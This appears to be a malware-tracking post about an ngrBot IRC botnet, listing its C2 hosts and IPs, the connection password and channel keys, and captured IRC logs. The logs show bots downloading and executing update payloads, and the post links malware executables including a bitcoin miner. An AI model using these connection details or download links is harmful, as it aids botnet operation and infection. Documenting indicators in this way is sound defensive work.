xL.x1x2.in (ngrBot hosted in France, Paris, Gandi)

Resolved : [xL.x1x2.in] To [95.142.167.131] port 4949 for irc
Resolved : [xL.x1x2.in] To [95.142.166.253] port 4949 for irc
Resolved : [xL.x1x2.in] To [92.243.15.137] port 4949 for irc
Resolved : [xL.x1x2.in] To [103.1.184.45] port 4949 for irc

Remote Host       Port Number
176.9.42.247      8332   (Bitcoin malware)
199.15.234.7      80
199.7.176.144     80
199.7.177.228     80
74.120.10.153     80
74.120.8.161      80
95.142.167.131    4949   (IRC port; before, he used port 5900)

You need a password to connect to this botnet. Getting the password is not so hard for people who really want to join there, lol.

The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://s481.hotfile.com/get/c7beee1329db43f39cc1d9b0df90a2fb0f227c7a/4f0345cd/2/eee0664170e0751b/84a4dcc/minerv4.exe
http://hotfile.com/dl/139063723/171a7fe/skkill.exe
http://hotfile.com/dl/139087308/808d704/minerv4.exe
http://hotfile.com/dl/138785531/af1c0bc/botxxxx1-2.exe
http://s332.hotfile.com/get/d414aca6e80162025fc78a0e2659aa1fc8727ab7/4f0345cb/2/1bdccba2084518fe/849f1ab/skkill.exe
http://s82.hotfile.com/get/58bcf25a8d53349f0da7e8bf9b40b69ad8d07d24/4f0345cf/2/94fdacb608286eb7/845b2fb/botxxxx1-2.exe

Just in case the hacker sends abuse to Hotfile or removes the exe files, here you have them all:

UPDATE:

Resolved : [xL.x1x2.in] To [92.243.28.75] PASS ngrBot
Resolved : [xL.x1x2.in] To [95.142.167.61] PASS ngrBot
Resolved : [xL.x1x2.in] To [92.243.14.131] PASS ngrBot
Resolved : [xL.x1x2.in] To [92.243.15.37] PASS ngrBot

NICK n{US|XPa}vlsxleu
USER vlsxleu 0 0 :vlsxleu
JOIN ##RedEm-001## redem
PRIVMSG ##RedEm-001## :[d="http://img103.herosh.com/2012/02/09/704386181.gif" s="203681 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Zcxaxz.exe" - Download retries: 0

Now talking in ##RedEm-001##
Topic On: [ ##RedEm-001## ] [ !NAZELup http://img103.herosh.com/2012/02/09/704386181.gif F418F0FE98948FFFCAB23BBDF5D0B362 ]
Topic By: [ xXxXxX ]

Remote Host Port Number
92.243.29.137 4949

NICK VirUs-erqpce
USER VirUs “” “qnw” :
8Coded
8VirUs..
JOIN ##A## DC

UPDATE:
92.243.29.137 5900 PASS ngrBot

NICK n{US|XPa}ddiwbhu
USER ddiwbhu 0 0 :ddiwbhu
JOIN ##RedEm-001## redem
PRIVMSG ##RedEm-001## :[d="http://img102.herosh.com/2012/02/23/67950698.gif" s="174879 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0

Hosting info:
http://whois.domaintools.com/92.243.29.137
